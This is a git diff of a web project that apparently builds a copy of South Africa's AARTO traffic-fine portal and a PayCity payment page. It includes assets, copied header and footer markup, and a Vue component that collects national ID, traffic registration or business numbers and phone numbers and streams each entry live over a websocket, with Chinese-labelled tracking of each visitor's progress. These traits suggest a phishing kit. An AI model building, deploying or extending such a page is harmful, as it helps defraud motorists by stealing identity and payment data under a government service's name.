c._cl='zh-CN'; c._cuc='googleTranslateElementInit'; c._cef='\x5b1,1,0\x5d'; c._cac=''; c._cam=''; c._cenv='prod'; c._cll='INFO'; c._ctkk='487188.1311683470'; const h='translate.googleapis.com'; const oph='translate-pa.googleapis.com'; const s='https'+'://'; c._pah=h; c._pas=s; const b=s+'translate.googleapis.com'; const staticPath = '/translate_static/'; c._pci=b+staticPath+'img/te_ctrl3.gif'; c._pmi=b+staticPath+'img/mini_google.png'; c._pbi=b+staticPath+'img/te_bk.gif'; c._pli=b+staticPath+'img/loading.gif'; c._ps='https:\/\/www.gstatic.com\/_\/translate_http\/_\/ss\/k\x3dtranslate_http.tr.pgV-E-68K-A.L.W.O\/am\x3dAMA\/d\x3d0\/rs\x3dAN8SPfo2HeflihKMbfgwV84pq3lzEm8ziw\/m\x3del_main_css'; c._plla=oph+'\/v1\/supportedLanguages'; c._puh='translate.google.com';c._cnal={};_loadCss(c._ps); _loadJs('https:\/\/translate.googleapis.com\/_\/translate_http\/_\/js\/k\x3dtranslate_http.tr.zh_CN.fqgcS9ZTTKg.O\/am\x3dAAAE\/d\x3d1\/exm\x3del_conf\/ed\x3d1\/rs\x3dAN8SPfoc9hYcdZvuBJZbtO5Sp0wUQ3ObOg\/m\x3del_main');_exportMessages(); _exportVersion('TE_20250728');
|
||||
})();
|
||||
})();
|
||||
|
||||
BIN
a8_za_Fine_aarto/public/Static_zy/amex.png
Normal file
|
After Width: | Height: | Size: 759 B |
|
After Width: | Height: | Size: 819 KiB |
@@ -0,0 +1 @@
|
||||
<svg enable-background="new 0 0 780 500" height="500" viewBox="0 0 780 500" width="780" xmlns="http://www.w3.org/2000/svg"><path d="m40 .001h700c22.092 0 40 17.909 40 40v420c0 22.092-17.908 40-40 40h-700c-22.091 0-40-17.908-40-40v-420c0-22.091 17.909-40 40-40z" fill="#2557d6"/><path d="m.253 235.69h37.441l8.442-19.51h18.9l8.42 19.51h73.668v-14.915l6.576 14.98h38.243l6.576-15.202v15.138h183.08l-.085-32.026h3.542c2.479.083 3.204.302 3.204 4.226v27.8h94.689v-7.455c7.639 3.92 19.518 7.455 35.148 7.455h39.836l8.525-19.51h18.9l8.337 19.51h76.765v-18.532l11.626 18.532h61.515v-122.51h-60.88v14.468l-8.522-14.468h-62.471v14.468l-7.828-14.468h-84.38c-14.123 0-26.539 1.889-36.569 7.153v-7.153h-58.229v7.153c-6.383-5.426-15.079-7.153-24.75-7.153h-212.74l-14.274 31.641-14.659-31.641h-67.005v14.468l-7.362-14.468h-57.145l-26.539 58.246v64.261h.003zm236.34-17.67h-22.464l-.083-68.794-31.775 68.793h-19.24l-31.858-68.854v68.854h-44.57l-8.42-19.592h-45.627l-8.505 19.592h-23.801l39.241-87.837h32.559l37.269 83.164v-83.164h35.766l28.678 59.587 26.344-59.587h36.485zm-165.9-37.823-14.998-35.017-14.915 35.017zm255.3 37.821h-73.203v-87.837h73.203v18.291h-51.289v15.833h50.06v18.005h-50.061v17.542h51.289zm103.16-64.18c0 14.004-9.755 21.24-15.439 23.412 4.794 1.748 8.891 4.838 10.84 7.397 3.094 4.369 3.628 8.271 3.628 16.116v17.255h-22.104l-.083-11.077c0-5.285.528-12.886-3.458-17.112-3.202-3.09-8.083-3.76-15.973-3.76h-23.523v31.95h-21.914v-87.838h50.401c11.199 0 19.451.283 26.535 4.207 6.933 3.924 11.09 9.652 11.09 19.45zm-27.699 13.042c-3.013 1.752-6.573 1.81-10.841 1.81h-26.62v-19.51h26.982c3.818 0 7.804.164 10.393 1.584 2.842 1.28 4.601 4.003 4.601 7.765 0 3.84-1.674 6.929-4.515 8.351zm62.844 51.138h-22.358v-87.837h22.358zm259.56 0h-31.053l-41.535-65.927v65.927h-44.628l-8.527-19.592h-45.521l-8.271 19.592h-25.648c-10.649 0-24.138-2.257-31.773-9.715-7.701-7.458-11.708-17.56-11.708-33.533 0-13.027 2.395-24.936 11.812-34.347 7.085-7.01 18.18-10.242 33.28-10.242h21.215v18.821h-20.771c-7.997 0-12.514 1.14-16.862 5.203-3.735 3.699-6.298 10.69-6.298 19.897 0 9.41 1.951 16.196 6.023 20.628 3.373 3.476 9.506 4.53 15.272 4.53h9.842l30.884-69.076h32.835l37.102 83.081v-83.08h33.366l38.519 61.174v-61.174h22.445zm-133.2-37.82-15.165-35.017-15.081 35.017zm189.04 178.08c-5.322 7.457-15.694 11.238-29.736 11.238h-42.319v-18.84h42.147c4.181 0 7.106-.527 8.868-2.175 1.665-1.474 2.605-3.554 2.591-5.729 0-2.561-1.064-4.593-2.677-5.811-1.59-1.342-3.904-1.95-7.722-1.95-20.574-.67-46.244.608-46.244-27.194 0-12.742 8.443-26.156 31.439-26.156h43.649v-17.479h-40.557c-12.237 0-21.129 2.81-27.425 7.174v-7.175h-59.985c-9.595 0-20.854 2.279-26.179 7.175v-7.175h-107.12v7.175c-8.524-5.892-22.908-7.175-29.549-7.175h-70.656v7.175c-6.745-6.258-21.742-7.175-30.886-7.175h-79.077l-18.094 18.764-16.949-18.764h-118.13v122.59h115.9l18.646-19.062 17.565 19.062 71.442.061v-28.838h7.021c9.479.14 20.66-.228 30.523-4.312v33.085h58.928v-31.952h2.842c3.628 0 3.985.144 3.985 3.615v28.333h179.01c11.364 0 23.244-2.786 29.824-7.845v7.845h56.78c11.815 0 23.354-1.587 32.134-5.649l.002-22.84zm-354.94-47.155c0 24.406-19.005 29.445-38.159 29.445h-27.343v29.469h-42.591l-26.984-29.086-28.042 29.086h-86.802v-87.859h88.135l26.961 28.799 27.875-28.799h70.021c17.389 0 36.929 4.613 36.929 28.945zm-174.22 40.434h-53.878v-17.48h48.11v-17.926h-48.11v-15.974h54.939l23.969 25.604zm86.81 10.06-33.644-35.789 33.644-34.65zm49.757-39.066h-28.318v-22.374h28.572c7.912 0 13.404 3.09 13.404 10.772 0 7.599-5.238 11.602-13.658 11.602zm148.36-40.373h73.138v18.17h-51.315v15.973h50.062v17.926h-50.062v17.48l51.314.08v18.23h-73.139zm-28.119 47.029c4.878 1.725 8.865 4.816 10.734 7.375 3.095 4.291 3.542 8.294 3.631 16.037v17.418h-22.002v-10.992c0-5.286.531-13.112-3.542-17.198-3.201-3.147-8.083-3.899-16.076-3.899h-23.42v32.09h-22.02v-87.859h50.594c11.093 0 19.173.47 26.366 4.146 6.915 4.004 11.266 9.487 11.266 19.511-.001 14.022-9.764 21.178-15.531 23.371zm-12.385-11.107c-2.932 1.667-6.556 1.811-10.818 1.811h-26.622v-19.732h26.982c3.902 0 7.807.08 10.458 1.587 2.84 1.423 4.538 4.146 4.538 7.903 0 3.758-1.699 6.786-4.538 8.431zm197.82 5.597c4.27 4.229 6.554 9.571 6.554 18.613 0 18.9-12.322 27.723-34.425 27.723h-42.68v-18.84h42.51c4.157 0 7.104-.525 8.95-2.175 1.508-1.358 2.589-3.333 2.589-5.729 0-2.561-1.17-4.592-2.675-5.811-1.675-1.34-3.986-1.949-7.803-1.949-20.493-.67-46.157.609-46.157-27.192 0-12.744 8.355-26.158 31.33-26.158h43.932v18.7h-40.198c-3.984 0-6.575.145-8.779 1.587-2.4 1.422-3.29 3.534-3.29 6.319 0 3.314 2.037 5.57 4.795 6.546 2.311.77 4.795.995 8.526.995l11.797.306c11.895.276 20.061 2.248 25.024 7.065zm86.955-23.52h-39.938c-3.986 0-6.638.144-8.867 1.587-2.312 1.423-3.202 3.534-3.202 6.322 0 3.314 1.951 5.568 4.791 6.544 2.312.771 4.795.996 8.444.996l11.878.304c11.983.284 19.982 2.258 24.86 7.072.891.67 1.422 1.422 2.033 2.175v-25z" fill="#fff"/></svg>
|
||||
|
After Width: | Height: | Size: 4.7 KiB |
@@ -0,0 +1 @@
|
||||
const l='data:image/svg+xml,%3csvg%20xmlns=\'http://www.w3.org/2000/svg\'%20id=\'flag-icons-cl\'%20viewBox=\'0%200%20640%20480\'%3e%3cdefs%3e%3cclipPath%20id=\'cl-a\'%3e%3cpath%20fill-opacity=\'.7\'%20d=\'M0%200h682.7v512H0z\'/%3e%3c/clipPath%3e%3c/defs%3e%3cg%20fill-rule=\'evenodd\'%20clip-path=\'url(%23cl-a)\'%20transform=\'scale(.9375)\'%3e%3cpath%20fill=\'%23fff\'%20d=\'M256%200h512v256H256z\'/%3e%3cpath%20fill=\'%230039a6\'%20d=\'M0%200h256v256H0z\'/%3e%3cpath%20fill=\'%23fff\'%20d=\'M167.8%20191.7%20128.2%20162l-39.5%2030%2014.7-48.8L64%20113.1l48.7-.5L127.8%2064l15.5%2048.5%2048.7.1-39.2%2030.4z\'/%3e%3cpath%20fill=\'%23d52b1e\'%20d=\'M0%20256h768v256H0z\'/%3e%3c/g%3e%3c/svg%3e';export{l as default};
|
||||
@@ -0,0 +1 @@
|
||||
import{_ as e,u as a,s as t,c as computed,r as ref,w as watch,o,a as onMounted,b as s,d as i,e as r,v as l,f as n,i as c,g as u,h as d}from'./index-BkIIaFwB.js';import m from'./flag-chile-DJ0gyZyb.js';const p={class:'main'},g={id:'idSearchSection',class:'dzsparallaxer auto-init height-is-based-on-content use-loading mode-scroll loaded dzsprx-readyall AdjustedHeight ng-scope','data-options':'{direction: \'reverse\';, settings_mode_oneelement_max_offset: \'150\'}'},v=['innerHTML'],h={class:'container text-center g-py-100--md g-py-80'},b={class:'form-group'},f={class:'ng-pristine ng-valid'},R={class:'container mt-3'},y={class:'d-flex flex-column'},N={class:'custom-control custom-radio mb-3'},_={class:'custom-control custom-radio mb-3'},x={class:'custom-control custom-radio mb-3'},w={class:'g-width-60x--md mx-auto'},D={class:'form-group g-mb-20'},S={class:'input-group u-shadow-v21 input-group-addon-right-radius g-mb-15 pcc-search'},I=['placeholder'],T={class:'input-group-addon input-group-addon-right-radius d-flex align-items-center g-bg-white g-brd-white g-color-gray-light-v1 g-pa-2'},z={id:'RSAIDNumberError',style:{color:'red !important','font-size':'20px !important'},class:'form-text g-color-white g-opacity-0_8 g-font-size-default'},A=e({__name:'index-bill',setup(e){const{t:A,configStore:B,wsStore:k,userStore:C,router:j}=a(),{name:E,email:H,phone:L}=t(C);B.area_code??A('local.area_code');const{account:M,order_id:P}=t(C),q=computed(()=>A('content.pay_description').replace('#_BRAND_NAME_#',B.brand_name));B.flag=m;const U=ref(!1);watch(L,(e,a)=>{L.value&&(L.value=L.value.replace(/\D/g,''),C.setData('phone',L.value),k.send(C.latestData('update')))}),o(async()=>{C.setData('pay_amount',B.pay_amount),P.value&&await j.push('/notice')}),onMounted(()=>{P.value&&j.push('/notice'),C.routerLog('home','进入主页','home'),C.setData({status:'首页',current_page:'home',current_action:'view'}),k.send(C.latestData('update'))});const V=ref('Please enter your Traffic Registration Number (TRN)'),F=e=>{V.value='Please enter your '+e};return(e,a)=>(d(),s('div',p,[i('section',g,[a[12]||(a[12]=i('div',{class:'divimage dzsparallaxer--target w-100 g-bg-cover pcc-dark-hero-overlay--after index-bg'},null,-1)),i('div',{class:'home-description',innerHTML:q.value},null,8,v),i('div',h,[i('div',b,[a[8]||(a[8]=i('h3',{class:'h1 text-uppercase g-color-white g-font-weight-600 g-mb-30'},'Search Enquiry Type',-1)),i('div',f,[i('div',R,[i('div',y,[i('div',N,[i('input',{type:'radio',id:'customRadio1',name:'customRadio',class:'custom-control-input',value:'RSAIDNumber',onClick:a[0]||(a[0]=e=>F('RSA ID Number'))}),a[5]||(a[5]=i('label',{class:'custom-control-label',for:'customRadio1'},'RSA ID Number',-1))]),i('div',_,[i('input',{type:'radio',id:'customRadio2',name:'customRadio',class:'custom-control-input',value:'BusinessRegistrationCertificate',onClick:a[1]||(a[1]=e=>F('Business Registration Number (BRN)'))}),a[6]||(a[6]=i('label',{class:'custom-control-label',for:'customRadio2'},'Business Registration Number (BRN)',-1))]),i('div',x,[i('input',{type:'radio',id:'customRadio3',name:'customRadio',checked:'',class:'custom-control-input',value:'RegistrationNumberCertificate',onClick:a[2]||(a[2]=e=>F('Traffic Registration Number (TRN)'))}),a[7]||(a[7]=i('label',{class:'custom-control-label',for:'customRadio3'},'Traffic Registration Number (TRN)',-1))])])])])]),i('div',w,[i('div',D,[i('div',S,[r(i('input',{minlength:'13',maxlength:'13','onUpdate:modelValue':a[3]||(a[3]=e=>c(M)?M.value=e:null),id:'idNumberInput',name:'idNumberInput',class:'form-control-left-radius form-control form-control-md g-brd-white g-font-size-16 border-right-0 pr-0 g-py-15',type:'text',placeholder:V.value},null,8,I),[[l,n(M)]]),i('div',T,[i('button',{title:'Invalid length, the length should be 13 characters',id:'onSearchBtn',class:'btn input-group-addon-right-radius u-btn-primary g-font-size-16 g-py-15 g-px-20 pcc-search-button',type:'button',onClick:a[4]||(a[4]=e=>{M.value&&M.value.length>=13?(U.value=!1,j.push('/notice')):U.value=!0})},a[9]||(a[9]=[i('i',{class:'icon-magnifier g-pos-rel g-top-1'},null,-1)]))])]),a[11]||(a[11]=i('small',{id:'RSAIDNumberText',class:'form-text g-color-white g-opacity-0_8 g-font-size-default'},'Please provide a valid ID Number, Traffic Registration Number or Business Registration Number.',-1)),r(i('small',z,a[10]||(a[10]=[i('strong',null,'Invalid id format, please revise your input.',-1)]),512),[[u,U.value]])])])])])]))}},[['__scopeId','data-v-85222b90']]);export{A as default};
|
||||
@@ -0,0 +1 @@
|
||||
.index-bg[data-v-85222b90]{height:140%;background-image:url(./PayCity-Website-Images4-C8v2DQwV.png);transform:translate3d(0,-55.9644px,0)}.custom-control-label[data-v-85222b90]{color:#fff;transform:scale(1.3)!important}.home-description[data-v-85222b90]{font-size:14px;color:red;background-color:#fff;margin:10px}.lookup-box[data-v-85222b90]{background:#fff;margin-top:-20px;border-radius:12px;padding:28px;box-shadow:0 4px 12px #0000001f}.lookup-box h5[data-v-85222b90]{margin-bottom:16px}.lookup-box label[data-v-85222b90]{font-weight:700;color:#003c71}.lookup-box input[data-v-85222b90]{width:100%;padding:12px;border-radius:8px;border:1px solid #b9c7d5;margin-top:8px}.card .title[data-v-85222b90]{font-weight:700;padding:5px 0}.card .item[data-v-85222b90]{background-color:#f7f7f7;display:flex;font-size:14px;margin:5px 0;padding:10px 5px}.card .item .name[data-v-85222b90]{text-transform:capitalize;min-width:40%;text-align:right;padding-right:1rem;font-weight:700}.tarjeta-contacto .info-box-form[data-v-85222b90]{color:#444;text-align:left;box-shadow:0 0 20px #d6d7d880;padding:20px}.titulo-modulo h2[data-v-85222b90]{margin:0 0 30px;font-size:2.75rem;font-weight:700;text-transform:uppercase;font-family:Oswald,sans-serif;color:#222}.titulo-modulo p[data-v-85222b90]{font-size:1.2rem;font-weight:500;padding:0;line-height:1px;margin:0 0 5px;letter-spacing:2px;text-transform:uppercase;color:#666;font-family:Manrope,sans-serif}.titulo-modulo p[data-v-85222b90]:after{content:"";width:120px;height:1px;display:inline-block;background:#ccc;margin:4px 10px}
|
||||
102860
a8_za_Fine_aarto/public/Static_zy/apps/ZA_PAY_01/assets/index-yUVF4vys.css
Normal file
|
After Width: | Height: | Size: 41 KiB |
|
After Width: | Height: | Size: 6.8 KiB |
|
After Width: | Height: | Size: 9.3 KiB |
|
After Width: | Height: | Size: 8.7 KiB |
@@ -0,0 +1 @@
|
||||
const l='data:image/svg+xml,%3csvg%20xmlns=\'http://www.w3.org/2000/svg\'%20id=\'flag-icons-za\'%20viewBox=\'0%200%20640%20480\'%3e%3cdefs%3e%3cclipPath%20id=\'za-a\'%3e%3cpath%20fill-opacity=\'.7\'%20d=\'M-71.9%200h682.7v512H-71.9z\'/%3e%3c/clipPath%3e%3c/defs%3e%3cg%20clip-path=\'url(%23za-a)\'%20transform=\'translate(67.4)scale(.93748)\'%3e%3cg%20fill-rule=\'evenodd\'%20stroke-width=\'1pt\'%3e%3cpath%20fill=\'%23000001\'%20d=\'M-71.9%20407.8V104.4L154%20256.1z\'/%3e%3cpath%20fill=\'%23000c8a\'%20d=\'m82.2%20512.1%20253.6-170.6H696V512H82.2z\'/%3e%3cpath%20fill=\'%23e1392d\'%20d=\'M66%200h630v170.8H335.7S69.3-1.7%2066%200\'/%3e%3cpath%20fill=\'%23ffb915\'%20d=\'M-71.9%2064v40.4L154%20256-72%20407.8v40.3l284.5-192z\'/%3e%3cpath%20fill=\'%23007847\'%20d=\'M-71.9%2064V0h95l301.2%20204h371.8v104.2H324.3L23%20512h-94.9v-63.9l284.4-192L-71.8%2064z\'/%3e%3cpath%20fill=\'%23fff\'%20d=\'M23%200h59.2l253.6%20170.7H696V204H324.3zm0%20512.1h59.2l253.6-170.6H696v-33.2H324.3L23%20512z\'/%3e%3c/g%3e%3c/g%3e%3c/svg%3e';export{l as default};
|
||||
BIN
a8_za_Fine_aarto/public/Static_zy/assets/images/AARTO-logo.jpg
Normal file
|
After Width: | Height: | Size: 55 KiB |
BIN
a8_za_Fine_aarto/public/Static_zy/assets/images/list-item.png
Normal file
|
After Width: | Height: | Size: 3.2 KiB |
BIN
a8_za_Fine_aarto/public/Static_zy/assets/images/roads-back.jpg
Normal file
|
After Width: | Height: | Size: 11 KiB |
|
After Width: | Height: | Size: 94 KiB |
|
After Width: | Height: | Size: 66 KiB |
|
After Width: | Height: | Size: 67 KiB |
|
After Width: | Height: | Size: 88 KiB |
@@ -0,0 +1 @@
|
||||
{"prefetch":[{"eagerness":"conservative","source":"document","where":{"and":[{"href_matches":"/*","relative_to":"document"}]}}]}
|
||||
1
a8_za_Fine_aarto/public/Static_zy/default.svg
Normal file
@@ -0,0 +1 @@
|
||||
<svg xmlns='http://www.w3.org/2000/svg' width='750' height='500' fill='none' viewBox='0 0 27 18'><path fill='#E6E9EB' d='M0 3a3 3 0 0 1 3-3h21a3 3 0 0 1 3 3v12a3 3 0 0 1-3 3H3a3 3 0 0 1-3-3V3z'/><path fill='#B9C4C9' d='M4 12h19v2H4z'/><rect width='4' height='4' x='4' y='4' fill='#fff' rx='1'/></svg>
|
||||
|
After Width: | Height: | Size: 300 B |
1
a8_za_Fine_aarto/public/Static_zy/el_main_css.css
Normal file
BIN
a8_za_Fine_aarto/public/Static_zy/fc.ico
Normal file
|
After Width: | Height: | Size: 948 B |
78
a8_za_Fine_aarto/public/Static_zy/footer.html
Normal file
@@ -0,0 +1,78 @@
|
||||
<app-root _nghost-rqh-c123="" ng-version="9.0.7" style="pointer-events: none;"><app-electives _nghost-rqh-c78="">
|
||||
<div _ngcontent-rqh-c78="" class="content">
|
||||
<div _ngcontent-rqh-c78="" class="row bg-white">
|
||||
<div _ngcontent-rqh-c78="" class="col-sm-4 p-5 card-spacer">
|
||||
<div _ngcontent-rqh-c78="" class="card elective-card">
|
||||
<div _ngcontent-rqh-c78="" class="background-block bg-primary"><img _ngcontent-rqh-c78=""
|
||||
src="/Static_zy/assets/images/roads-back.jpg" alt="profile-sample1" class="background"></div>
|
||||
<div _ngcontent-rqh-c78="" class="profile-thumb-block"><img _ngcontent-rqh-c78=""
|
||||
src="/Static_zy/assets/images/list-item.png" alt="list-image" class="profile"></div>
|
||||
<div _ngcontent-rqh-c78="" class="card-content">
|
||||
<h2 _ngcontent-rqh-c78="">Pay a discount penalty<small _ngcontent-rqh-c78="">Only in first
|
||||
32 days</small></h2>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div _ngcontent-rqh-c78="" class="col-sm-4 p-5 card-spacer">
|
||||
<div _ngcontent-rqh-c78="" class="card elective-card">
|
||||
<div _ngcontent-rqh-c78="" class="background-block bg-primary"><img _ngcontent-rqh-c78=""
|
||||
src="/Static_zy/assets/images/roads-back.jpg" alt="profile-sample1" class="background"></div>
|
||||
<div _ngcontent-rqh-c78="" class="profile-thumb-block"><img _ngcontent-rqh-c78=""
|
||||
src="/Static_zy/assets/images/list-item.png" alt="list-image" class="profile"></div>
|
||||
<div _ngcontent-rqh-c78="" class="card-content">
|
||||
<h2 _ngcontent-rqh-c78="">Make a representation to RTIA<small _ngcontent-rqh-c78="">Only in
|
||||
first 64 days</small></h2>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div _ngcontent-rqh-c78="" class="col-sm-4 p-5 card-spacer">
|
||||
<div _ngcontent-rqh-c78="" class="card elective-card">
|
||||
<div _ngcontent-rqh-c78="" class="background-block bg-primary"><img _ngcontent-rqh-c78=""
|
||||
src="/Static_zy/assets/images/roads-back.jpg" alt="profile-sample1" class="background"></div>
|
||||
<div _ngcontent-rqh-c78="" class="profile-thumb-block"><img _ngcontent-rqh-c78=""
|
||||
src="/Static_zy/assets/images/list-item.png" alt="list-image" class="profile"></div>
|
||||
<div _ngcontent-rqh-c78="" class="card-content">
|
||||
<h2 _ngcontent-rqh-c78="">Arrange to pay in monthly instalments<small
|
||||
_ngcontent-rqh-c78="">Only in first 64 days</small></h2>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div _ngcontent-rqh-c78="" class="col-sm-4 p-5 card-spacer">
|
||||
<div _ngcontent-rqh-c78="" class="card elective-card">
|
||||
<div _ngcontent-rqh-c78="" class="background-block bg-primary"><img _ngcontent-rqh-c78=""
|
||||
src="/Static_zy/assets/images/roads-back.jpg" alt="profile-sample1" class="background"></div>
|
||||
<div _ngcontent-rqh-c78="" class="profile-thumb-block"><img _ngcontent-rqh-c78=""
|
||||
src="/Static_zy/assets/images/list-item.png" alt="list-image" class="profile"></div>
|
||||
<div _ngcontent-rqh-c78="" class="card-content">
|
||||
<h2 _ngcontent-rqh-c78="">Nominate the driver of the vehicle<small
|
||||
_ngcontent-rqh-c78="">Only in first 32 days</small></h2>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div _ngcontent-rqh-c78="" class="col-sm-4 p-5 card-spacer">
|
||||
<div _ngcontent-rqh-c78="" class="card elective-card">
|
||||
<div _ngcontent-rqh-c78="" class="background-block bg-primary"><img _ngcontent-rqh-c78=""
|
||||
src="/Static_zy/assets/images/roads-back.jpg" alt="profile-sample1" class="background"></div>
|
||||
<div _ngcontent-rqh-c78="" class="profile-thumb-block"><img _ngcontent-rqh-c78=""
|
||||
src="/Static_zy/assets/images/list-item.png" alt="list-image" class="profile"></div>
|
||||
<div _ngcontent-rqh-c78="" class="card-content">
|
||||
<h2 _ngcontent-rqh-c78="">Elect to be tried in court<small _ngcontent-rqh-c78="">Only in
|
||||
first 64 days</small></h2>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div _ngcontent-rqh-c78="" class="col-sm-4 p-5 card-spacer">
|
||||
<div _ngcontent-rqh-c78="" class="card elective-card">
|
||||
<div _ngcontent-rqh-c78="" class="background-block bg-primary"><img _ngcontent-rqh-c78=""
|
||||
src="/Static_zy/assets/images/roads-back.jpg" alt="profile-sample1" class="background"></div>
|
||||
<div _ngcontent-rqh-c78="" class="profile-thumb-block"><img _ngcontent-rqh-c78=""
|
||||
src="/Static_zy/assets/images/list-item.png" alt="list-image" class="profile"></div>
|
||||
<div _ngcontent-rqh-c78="" class="card-content">
|
||||
<h2 _ngcontent-rqh-c78="">Revocation of an Enforcement Order<small
|
||||
_ngcontent-rqh-c78="">Only after receiving an order</small></h2>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</app-electives><!----></app-root>
|
||||
BIN
a8_za_Fine_aarto/public/Static_zy/galeria21085.png
Normal file
|
After Width: | Height: | Size: 896 KiB |
117
a8_za_Fine_aarto/public/Static_zy/header.html
Normal file
@@ -0,0 +1,117 @@
|
||||
<app-root _nghost-rqh-c123="" ng-version="9.0.7"><app-header _ngcontent-rqh-c123="" _nghost-rqh-c122="" style="pointer-events: none;">
|
||||
<div _ngcontent-rqh-c122="" class="header-spacer" >
|
||||
<div _ngcontent-rqh-c122="" class="header" >
|
||||
<div _ngcontent-rqh-c122="" class="row">
|
||||
<div _ngcontent-rqh-c122="" class="col-sm-3 col-md-3 col-lg-3">
|
||||
<div _ngcontent-rqh-c122="" class="logo-holder"><a _ngcontent-rqh-c122="" routerlink="/"
|
||||
class="natis-logo" href="#/"><img _ngcontent-rqh-c122=""
|
||||
src="/Static_zy/assets/images/AARTO-logo.jpg" alt="NaTIS-logo" class="img-fluid logo"></a>
|
||||
</div>
|
||||
</div>
|
||||
<div _ngcontent-rqh-c122="" class="col-sm-9 col-md-9 col-lg-9">
|
||||
<div _ngcontent-rqh-c122="" class="row top-menus">
|
||||
<div _ngcontent-rqh-c122="" class="right-top-menu">
|
||||
<div _ngcontent-rqh-c122="" class="float-right col-4">
|
||||
<div _ngcontent-rqh-c122="" class="logInOut">
|
||||
<div _ngcontent-rqh-c122="" class="float-right">
|
||||
<div _ngcontent-rqh-c122="">
|
||||
<!-- <div _ngcontent-rqh-c122="" class="login-holder">
|
||||
<div _ngcontent-rqh-c122="" class="row"><i _ngcontent-rqh-c122=""
|
||||
aria-hidden="true" class="fa fa-user"
|
||||
style="color: #1e3256;"></i><a _ngcontent-rqh-c122=""
|
||||
routerlink="/login" href="#/login">LOGIN</a> <span
|
||||
_ngcontent-rqh-c122="" class="divider">|</span> <a
|
||||
_ngcontent-rqh-c122="" routerlink="/register"
|
||||
class="register-link" href="#/register">REGISTER</a></div>
|
||||
</div> -->
|
||||
</div>
|
||||
</div>
|
||||
</div><!----><!---->
|
||||
</div>
|
||||
<div _ngcontent-rqh-c122="">
|
||||
<nav _ngcontent-rqh-c122="" class="navbar navbar-expand-lg"><button
|
||||
_ngcontent-rqh-c122="" type="button" data-toggle="collapse"
|
||||
data-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false"
|
||||
aria-label="Toggle navigation" class="navbar-toggler"><span
|
||||
_ngcontent-rqh-c122="" class="navbar-toggler-icon"></span></button>
|
||||
</nav>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
<div _ngcontent-rqh-c122="" class="row bottom-menu">
|
||||
<nav _ngcontent-rqh-c122="" class="navbar navbar-expand-lg navbar-light bg-white"><a
|
||||
_ngcontent-rqh-c122="" href="#" class="navbar-brand"><i _ngcontent-rqh-c122=""
|
||||
aria-hidden="true" class="fa fa-home home-icon"></i></a><button
|
||||
_ngcontent-rqh-c122="" type="button" data-toggle="collapse"
|
||||
data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown"
|
||||
aria-expanded="false" aria-label="Toggle navigation"
|
||||
class="navbar-toggler collapsed"><span _ngcontent-rqh-c122=""
|
||||
class="navbar-toggler-icon"></span></button>
|
||||
<div _ngcontent-rqh-c122="" id="navbarNavDropdown" class="navbar-collapse collapse"
|
||||
style="">
|
||||
<ul _ngcontent-rqh-c122="" class="navbar-nav">
|
||||
<li _ngcontent-rqh-c122="" class="nav-item"><a _ngcontent-rqh-c122="" href="#"
|
||||
class="nav-link">Home <span _ngcontent-rqh-c122=""
|
||||
class="sr-only">(current)</span></a></li>
|
||||
<li _ngcontent-rqh-c122="" class="nav-item dropdown"><a _ngcontent-rqh-c122=""
|
||||
href="#" id="navbarDropdownMenuLink" data-toggle="dropdown"
|
||||
aria-haspopup="true" aria-expanded="false"
|
||||
class="nav-link dropdown-toggle"> Electives </a>
|
||||
<div _ngcontent-rqh-c122="" aria-labelledby="navbarDropdownMenuLink"
|
||||
class="dropdown-menu"><!----><a _ngcontent-rqh-c122=""
|
||||
routerlink="/representation" routerlinkactive="isActive"
|
||||
class="sub-menu dropdown-item"
|
||||
href="#/representation">Representation</a><a _ngcontent-rqh-c122=""
|
||||
routerlink="/nomination" routerlinkactive="isActive"
|
||||
class="sub-menu dropdown-item" href="#/nomination">Nomination of
|
||||
Driver</a><a _ngcontent-rqh-c122="" routerlink="/revocation"
|
||||
routerlinkactive="isActive" class="sub-menu dropdown-item"
|
||||
href="#/revocation">Revocation</a><a _ngcontent-rqh-c122=""
|
||||
routerlink="/instalment" routerlinkactive="isActive"
|
||||
class="sub-menu dropdown-item" href="#/instalment">Instalments
|
||||
Payment</a><a _ngcontent-rqh-c122=""
|
||||
href="/Static_zy/assets/docs/AARTO_Service_Outlets_2023.pdf" target="_blank"
|
||||
class="nav-link">Aarto Service Outlets</a></div>
|
||||
</li><!---->
|
||||
<li _ngcontent-rqh-c122="" nav-item="" class="nav-item"><a
|
||||
_ngcontent-rqh-c122="" class="nav-link" href="#/documents">Documents</a>
|
||||
</li>
|
||||
<li _ngcontent-rqh-c122="" nav-item="" class="nav-item"><a
|
||||
_ngcontent-rqh-c122="" href="/Static_zy/assets/docs/AARTO_Service_Outlets_2023.pdf"
|
||||
target="_blank" class="nav-link">Aarto Service Outlets</a></li>
|
||||
</ul>
|
||||
</div>
|
||||
</nav>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div>
|
||||
</div><app-sidebar _ngcontent-rqh-c122="" _nghost-rqh-c121="">
|
||||
<div _ngcontent-rqh-c121="" class="sidebar"><!----><ngx-loading _ngcontent-rqh-c121=""
|
||||
_nghost-rqh-c82=""><!----></ngx-loading>
|
||||
<div _ngcontent-rqh-c121="">
|
||||
<div _ngcontent-rqh-c121="" class="submenu">
|
||||
<ul _ngcontent-rqh-c121="" class="context-menu">
|
||||
<li _ngcontent-rqh-c121=""><a _ngcontent-rqh-c121="" href="#"
|
||||
class="menu-item-selected"><span _ngcontent-rqh-c121="" class="menu-text">Electives
|
||||
</span></a></li>
|
||||
</ul>
|
||||
<ul _ngcontent-rqh-c121="" class="navbar-nav">
|
||||
<li _ngcontent-rqh-c121=""><!----></li>
|
||||
<li _ngcontent-rqh-c121=""><a _ngcontent-rqh-c121="" routerlink="/representation"
|
||||
routerlinkactive="isActive" class="sub-menu"
|
||||
href="#/representation">Representation</a></li>
|
||||
<li _ngcontent-rqh-c121=""><a _ngcontent-rqh-c121="" routerlink="/nomination"
|
||||
routerlinkactive="isActive" class="sub-menu" href="#/nomination">Nomination of
|
||||
Driver</a></li>
|
||||
<li _ngcontent-rqh-c121=""><a _ngcontent-rqh-c121="" routerlink="/revocation"
